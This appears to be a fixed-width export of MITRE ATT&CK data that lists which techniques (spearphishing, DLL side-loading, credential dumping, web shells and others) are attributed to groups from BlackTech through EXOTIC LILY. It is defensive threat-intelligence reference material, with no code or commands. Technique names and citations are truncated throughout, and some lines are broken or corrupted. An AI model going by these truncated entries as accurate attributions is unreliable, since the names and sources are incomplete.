G0098 BlackTech intrusion- group uses T1574.002DLL Side-L attack-pat technique [BlackTech
G0098 BlackTech intrusion- group uses T1588.004Digital Certattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1190 Exploit Pubattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1203 Exploitatioattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1204.002Malicious Fattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1204.001Malicious Lattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1106 Native API attack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1046 Network Seattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1036.002Right-to-Leattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1021.004SSH attack-pat technique [BlackTech
G0098 BlackTech intrusion- group uses T1566.001Spearphishattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1566.002Spearphishattack-pat technique [BlackTech]
G0098 BlackTech intrusion- group uses T1588.002Tool attack-pat technique [BlackTech]
G0108 Blue Mockiintrusion- group uses T1134 Access Tokattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1574.012COR_PROFIattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1496.001Compute Hiattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1027.013Encrypted/attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1190 Exploit Pubattack-pat technique [Blue Mocki
G0108 Blue Mockiintrusion- group uses T1003.001LSASS Memattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1036.005Match Legiattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1112 Modify Regattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1059.001PowerShellattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1090 Proxy attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1218.010Regsvr32 attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1021.001Remote Des attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1218.011Rundll32 attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1021.002SMB/Windo attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1053.005Scheduled attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1569.002Service Ex attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1082 System Inf attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1588.002Tool attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1059.003Windows Cattack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1047 Windows M attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1546.003Windows Ma attack-pat technique [Blue Mock
G0108 Blue Mockiintrusion- group uses T1543.003Windows Se attack-pat technique [Blue Mock
G1012 CURIUM intrusion- group uses T1005 Data from attack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1583.001Domains attack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1189 Drive-by C attack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1608.004Drive-by T attack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1585.002Email Accoattack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1048.002Exfiltrati attack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1041 Exfiltratio attack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1204.002Malicious Fattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1059.001PowerShellattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1583.004Server attack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1585.001Social Medattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1566.001Spearphishattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1598.003Spearphishattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1566.003Spearphishiattack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1082 System Inf attack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1124 System Timattack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1583.003Virtual Pri attack-pat technique [CURIUM](ht
G1012 CURIUM intrusion- group uses T1584.006Web Servicattack-pat technique [CURIUM](h
G1012 CURIUM intrusion- group uses T1505.003Web Shell attack-pat technique [CURIUM](ht
G0008 Carbanak intrusion- group uses T1102.002Bidirectio attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1562.004Disable or attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1036.004Masquerade attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1036.005Match Legiattack-pat technique [Carbanak]
G0008 Carbanak intrusion- group uses T1219 Remote Accattack-pat technique [Carbanak]
G0008 Carbanak intrusion- group uses T1218.011Rundll32 attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1588.002Tool attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1078 Valid Acco attack-pat technique [Carbanak](
G0008 Carbanak intrusion- group uses T1543.003Windows Se attack-pat technique [Carbanak](
G0114 Chimera intrusion- group uses T1560.001Archive viaattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1119 Automatedattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1217 Browser Inattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1070.001Clear Windattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1027.010Command aOttack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1110.004Credential attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1589.001Credentialsattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1574.002DLL Side-L attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1071.004DNS attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1039 Data from attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1087.002Domain Acattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1078.002Domain Acattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1556.001Domain Con attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1482 Domain Truattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1041 Exfiltratio attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1567.002Exfiltratio attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1133 External R attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1070.004File Deleti attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1083 File and Di attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1105 Ingress Tooattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1570 Lateral Tooattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1087.001Local Acco attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1074.001Local Data attack-pat technique [Chimera](
[Chimera](https://attack.mitr
G0114 Chimera intrusion- group uses T1114.001Local Emailattack-pat technique copy</code>.(Citation: NCC G
G0114 Chimera intrusion- group uses T1069.001Local Grouattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1036.005Match Legiattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1111 Multi-Factoattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1003.003NTDS attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1106 Native API attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1046 Network Seattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1135 Network Shattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1550.002Pass the H attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1201 Password Pattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1110.003Password Sattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1059.001PowerShellattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1057 Process Di attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1572 Protocol T attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1012 Query Regiattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1074.002Remote Datattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1021.001Remote Des attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1114.002Remote Ema attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1018 Remote Sysattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1021.002SMB/Windo attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1053.005Scheduled attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1569.002Service Ex attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1213.002Sharepointattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1082 System Inf attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1016 System Netattack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1049 System Netattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1033 System Own attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1007 System Serattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1124 System Timattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1070.006Timestompattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1588.002Tool attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1078 Valid Acco attack-pat technique [Chimera](h
G0114 Chimera intrusion- group uses T1071.001Web Protocattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1059.003Windows Cattack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1047 Windows M attack-pat technique [Chimera](
G0114 Chimera intrusion- group uses T1021.006Windows Rattack-pat technique [Chimera](
[Cinnamon Tempest](https://
G1021 Cinnamon intrusion- group uses T1574.001DLL Searchattack-pat technique
G1021 Cinnamon intrusion- group uses T1574.002DLL Side-L attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1140 Deobfuscatattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1078.002Domain Acattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1567.002Exfiltratio attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1190 Exploit Pubattack-pat technique [Cinnamon T
G1021 Cinnamon intrusion- group uses T1657 Financial Tattack-pat technique [Cinnamon T
G1021 Cinnamon intrusion- group uses T1484.001Group Poliattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1105 Ingress Tooattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1059.001PowerShellattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1572 Protocol T attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1090 Proxy attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1059.006Python attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1021.002SMB/Windo attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1080 Taint Shar attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1588.002Tool attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1078 Valid Acco attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1059.003Windows Cattack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1047 Windows M attack-pat technique [Cinnamon
G1021 Cinnamon intrusion- group uses T1543.003Windows Se attack-pat technique [Cinnamon T
G0003 Cleaver intrusion- group uses T1557.002ARP Cache attack-pat technique [Cleaver](h
G0003 Cleaver intrusion- group uses T1003.001LSASS Memattack-pat technique [Cleaver](
G0003 Cleaver intrusion- group uses T1587.001Malware attack-pat technique [Cleaver](h
G0003 Cleaver intrusion- group uses T1585.001Social Medattack-pat technique [Cleaver](h
G0003 Cleaver intrusion- group uses T1588.002Tool attack-pat technique [Cleaver](h
G0080 Cobalt Grointrusion- group uses T1573.002Asymmetricattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1548.002Bypass Useattack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1218.003CMSTP attack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1027.010Command aOttack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1195.002Compromise attack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1071.004DNS attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1559.002Dynamic Daattack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1203 Exploitatioattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1068 Exploitatioattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1070.004File Deleti attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1105 Ingress Tooattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1059.007JavaScript attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1037.001Logon Scri attack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1204.002Malicious Fattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1204.001Malicious Lattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1046 Network Seattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1218.008Odbcconf attack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1059.001PowerShellattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1055 Process Injattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1572 Protocol T attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1547.001Registry Ruattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1218.010Regsvr32 attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1219 Remote Accattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1021.001Remote Des attack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1053.005Scheduled attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1518.001Security S attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1566.001Spearphishattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1566.002Spearphishattack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1588.002Tool attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1059.005Visual Basiattack-pat technique [Cobalt Gr
G0080 Cobalt Grointrusion- group uses T1071.001Web Protocattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1059.003Windows Cattack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1543.003Windows Se attack-pat technique [Cobalt Gro
G0080 Cobalt Grointrusion- group uses T1220 XSL Script attack-pat technique [Cobalt Gro
G0142 Confucius intrusion- group uses T1119 Automatedattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1041 Exfiltratio attack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1567.002Exfiltratio attack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1203 Exploitatioattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1083 File and Di attack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1105 Ingress Tooattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1204.002Malicious Fattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1204.001Malicious Lattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1218.005Mshta attack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1059.001PowerShellattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1547.001Registry Ruattack-pat technique [Confucius
G0142 Confucius intrusion- group uses T1053.005Scheduled attack-pat technique [Confucius
G0142 Confucius intrusion- group uses T1566.001Spearphishattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1566.002Spearphishattack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1082 System Inf attack-pat technique [Confucius]
G0142 Confucius intrusion- group uses T1221 Template Iattack-pat technique [Confucius
G0142 Confucius intrusion- group uses T1059.005Visual Basiattack-pat technique [Confucius
G0142 Confucius intrusion- group uses T1071.001Web Protocattack-pat technique [Confucius
G0142 Confucius intrusion- group uses T1583.006Web Servicattack-pat technique [Confucius]
G0052 CopyKittenintrusion- group uses T1560.003Archive vi attack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1560.001Archive viaattack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1553.002Code Signi attack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1564.003Hidden Wi attack-pat technique [CopyKitte
G0052 CopyKittenintrusion- group uses T1059.001PowerShellattack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1090 Proxy attack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1218.011Rundll32 attack-pat technique [CopyKitten
G0052 CopyKittenintrusion- group uses T1588.002Tool attack-pat technique [CopyKitten
G1034 Daggerfly intrusion- group uses T1553.002Code Signi attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1587.002Code Signinattack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1195.002Compromise attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1574.002DLL Side-L attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1189 Drive-by C attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1105 Ingress Tooattack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1136.001Local Acco attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1204.001Malicious Lattack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1059.001PowerShellattack-pat technique [Daggerfly
G1034 Daggerfly intrusion- group uses T1012 Query Regiattack-pat technique [Daggerfly
G1034 Daggerfly intrusion- group uses T1036.003Rename Sys attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1218.011Rundll32 attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1053.005Scheduled attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1003.002Security A attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1584.004Server attack-pat technique [Daggerfly]
G1034 Daggerfly intrusion- group uses T1082 System Inf attack-pat technique [Daggerfly
G1034 Daggerfly intrusion- group uses T1071.001Web Protocattack-pat technique [Daggerfly
G0070 Dark Caracintrusion- group uses T1218.001Compiled Hattack-pat technique [Dark Cara
G0070 Dark Caracintrusion- group uses T1005 Data from attack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1189 Drive-by C attack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1027.013Encrypted/attack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1083 File and Di attack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1204.002Malicious Fattack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1547.001Registry Ruattack-pat technique [Dark Cara
G0070 Dark Caracintrusion- group uses T1113 Screen Capattack-pat technique [Dark Cara
G0070 Dark Caracintrusion- group uses T1027.002Software Pattack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1566.003Spearphishiattack-pat technique [Dark Cara
G0070 Dark Caracintrusion- group uses T1071.001Web Protocattack-pat technique [Dark Carac
G0070 Dark Caracintrusion- group uses T1059.003Windows Cattack-pat technique [Dark Cara
G0079 DarkHydruintrusion- group uses T1187 Forced Autattack-pat technique [DarkHydrus
G0079 DarkHydruintrusion- group uses T1564.003Hidden Wi attack-pat technique [DarkHydru
G0079 DarkHydruintrusion- group uses T1204.002Malicious Fattack-pat technique [DarkHydrus
G0079 DarkHydruintrusion- group uses T1059.001PowerShellattack-pat technique [DarkHydrus
G0079 DarkHydruintrusion- group uses T1566.001Spearphishattack-pat technique [DarkHydrus
G0079 DarkHydruintrusion- group uses T1221 Template Iattack-pat technique [DarkHydrus
G0079 DarkHydruintrusion- group uses T1588.002Tool attack-pat technique [DarkHydrus
G0105 DarkVishnyintrusion- group uses T1110 Brute Forc attack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1200 Hardware Aattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1046 Network Seattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1135 Network Shattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1040 Network Snattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1571 Non-Standaattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1059.001PowerShellattack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1219 Remote Accattack-pat technique [DarkVishn
G0105 DarkVishnyintrusion- group uses T1588.002Tool attack-pat technique [DarkVishny
G0105 DarkVishnyintrusion- group uses T1543.003Windows Se attack-pat technique [DarkVishny
G0012 Darkhotel intrusion- group uses T1553.002Code Signi attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1140 Deobfuscatattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1189 Drive-by C attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1027.013Encrypted/attack-pat technique [Darkhotel
G0012 Darkhotel intrusion- group uses T1203 Exploitatioattack-pat technique [Darkhotel
G0012 Darkhotel intrusion- group uses T1083 File and Di attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1105 Ingress Tooattack-pat technique [Darkhotel
G0012 Darkhotel intrusion- group uses T1056.001Keyloggingattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1204.002Malicious Fattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1036.005Match Legiattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1057 Process Di attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1547.001Registry Ruattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1091 Replicatio attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1518.001Security S attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1566.001Spearphishattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1573.001Symmetric attack-pat technique [Darkhotel
G0012 Darkhotel intrusion- group uses T1497.001System Cheattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1082 System Inf attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1016 System Netattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1124 System Timattack-pat technique [Darkhotel
G0012 Darkhotel intrusion- group uses T1080 Taint Shar attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1497.002User Activiattack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1497 Virtualiza attack-pat technique [Darkhotel]
G0012 Darkhotel intrusion- group uses T1059.003Windows Cattack-pat technique [Darkhotel]
G0009 Deep Pandintrusion- group uses T1546.008Accessibili attack-pat technique [Deep Panda
G0009 Deep Pandintrusion- group uses T1564.003Hidden Wi attack-pat technique [Deep Pand
G0009 Deep Pandintrusion- group uses T1027.005Indicator attack-pat technique [Deep Panda
G0009 Deep Pandintrusion- group uses T1059.001PowerShellattack-pat technique [Deep Pand
G0009 Deep Pandintrusion- group uses T1057 Process Di attack-pat technique [Deep Panda
G0009 Deep Pandintrusion- group uses T1218.010Regsvr32 attack-pat technique [Deep Panda
G0009 Deep Pandintrusion- group uses T1018 Remote Sysattack-pat technique [Deep Panda
G0009 Deep Pandintrusion- group uses T1021.002SMB/Windo attack-pat technique [Deep Pand
G0009 Deep Pandintrusion- group uses T1505.003Web Shell attack-pat technique [Deep Pand
G0009 Deep Pandintrusion- group uses T1047 Windows M attack-pat technique The [Deep P
G0035 Dragonfly intrusion- group uses T1098.007Additional attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1560 Archive Coattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1110 Brute Forc attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1591.002Business Reattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1070.001Clear Windattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1059 Command attack-pat
an technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1195.002Compromise attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1005 Data from attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1562.004Disable or attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1087.002Domain Acattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1069.002Domain Grattack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1583.001Domains attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1189 Drive-by C attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1608.004Drive-by T attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1190 Exploit Pubattack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1203 Exploitatioattack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1210 Exploitatioattack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1133 External R attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1070.004File Deleti attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1071.002File Transf attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1083 File and Di attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1187 Forced Autattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1564.002Hidden Useattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1105 Ingress Tooattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1003.004LSA Secret attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1136.001Local Acco attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1074.001Local Data attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1204.002Malicious Fattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1036.010Masqueradattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1112 Modify Regattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1003.003NTDS attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1135 Network Shattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1110.002Password Cattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1059.001PowerShellattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1059.006Python attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1012 Query Regiattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1547.001Registry Ruattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1021.001Remote Des attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1114.002Remote Ema attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1018 Remote Sysattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1053.005Scheduled attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1113 Screen Capattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1003.002Security A attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1584.004Server attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1566.001Spearphishattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1598.002Spearphishattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1598.003Spearphishattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1016 System Netattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1033 System Own attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1221 Template Iattack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1588.002Tool attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1078 Valid Acco attack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1583.003Virtual Pri attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1595.002Vulnerabiliattack-pat technique [Dragonfly
G0035 Dragonfly intrusion- group uses T1505.003Web Shell attack-pat technique [Dragonfly]
G0035 Dragonfly intrusion- group uses T1059.003Windows Cattack-pat technique [Dragonfly]
G1011 EXOTIC LIL intrusion- group uses T1583.001Domains attack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1585.002Email Accoattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1589.002Email Addrattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1203 Exploitatioattack-pat technique [EXOTIC LI
G1011 EXOTIC LIL intrusion- group uses T1204.002Malicious Fattack-pat technique [EXOTIC LIL
G1011 EXOTIC LIL intrusion- group uses T1204.001Malicious Lattack-pat technique [EXOTIC LIL
